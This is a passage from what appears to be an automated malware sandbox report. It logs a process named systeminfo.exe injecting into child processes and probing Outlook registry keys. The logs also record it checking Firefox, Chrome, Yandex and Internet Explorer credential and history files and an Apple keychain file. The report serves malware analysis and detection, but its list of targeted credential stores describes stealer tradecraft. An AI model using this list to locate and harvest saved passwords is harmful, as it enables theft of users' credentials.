| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x884 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x884 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x884 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x884 | os_tid = 0x9e4, address = 0x0 |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = DLLPathEx, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = MSIApplicationLCID, data = 77 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | advapi32.dll | base_address = 0x756e0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75450000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75c50000 |
|
1 | |
| Load | C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x759f0000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75a04f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75a0359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75a01252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75a04208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75a04d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75a8410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75a84195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75a0d31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75a1ee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x772b441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x772dc50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x772dc381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75a1f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x772c05d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x772dca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77290b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7734fde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x772e1e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75a84761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75a7cd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75a8424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75a846b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75a96676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75a84751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75a965f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75a847c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75a847e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75a847f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75a1eee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-11-28 18:18:50 (UTC) |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0xa98 |
| Parent PID | 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
964
0x
724
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
|
| rsaenh.dll | 0x00140000 | 0x0017bfff | Memory Mapped File | Readable |
|
|
|
|
| tzres.dll | 0x00140000 | 0x00140fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00148fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000150000 | 0x00150000 | 0x00156fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00178fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0045afff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000630000 | 0x00630000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000880000 | 0x00880000 | 0x0097ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a10000 | 0x00a10000 | 0x00b0ffff | Private Memory | Readable, Writable |
|
|
|
|
| 3292.exe | 0x00be0000 | 0x00bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x01ffffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x023d0fff | Private Memory | Readable, Writable |
|
|
|
|
| nss3.dll | 0x022d0000 | 0x02481fff | Memory Mapped File | Readable |
|
|
|
|
| nss3.dll | 0x022d0000 | 0x02481fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x023cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x0251ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x0250ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002510000 | 0x02510000 | 0x0251ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002520000 | 0x02520000 | 0x0271ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002600000 | 0x02600000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002700000 | 0x02700000 | 0x02af2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| freebl3.dll | 0x73c90000 | 0x73cdefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| freebl3.dll | 0x73ca0000 | 0x73ceefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| softokn3.dll | 0x73ce0000 | 0x73d06fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nssdbm3.dll | 0x73cf0000 | 0x73d06fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| softokn3.dll | 0x73d10000 | 0x73d36fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nssdbm3.dll | 0x73d20000 | 0x73d36fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x73d40000 | 0x73da8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mozglue.dll | 0x73db0000 | 0x73dd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x73de0000 | 0x73e9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wsock32.dll | 0x73ea0000 | 0x73ea6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nss3.dll | 0x73eb0000 | 0x74064fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| vaultcli.dll | 0x740e0000 | 0x740ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| atl.dll | 0x74130000 | 0x74143fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pstorec.dll | 0x74150000 | 0x7415cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74160000 | 0x74168fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x742f0000 | 0x7448dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x746e0000 | 0x746e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x746f0000 | 0x7474bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74750000 | 0x7478efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x74860000 | 0x74891fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74b30000 | 0x74b6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x74b70000 | 0x74b85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x74eb0000 | 0x74eb4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x74ec0000 | 0x750bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750c0000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75350000 | 0x75444fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x75890000 | 0x758c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x758d0000 | 0x759ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comdlg32.dll | 0x75bd0000 | 0x75c4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76b60000 | 0x76beefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76c40000 | 0x76d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x77240000 | 0x77245fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x8b4 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x8b4 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x8b4 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x8b4 | os_tid = 0x964, address = 0x0 |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\ProgramData\FB70.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | type = file_attributes |
|
3 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Sea Monkey\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = file_attributes |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist | type = file_attributes |
|
1 | |
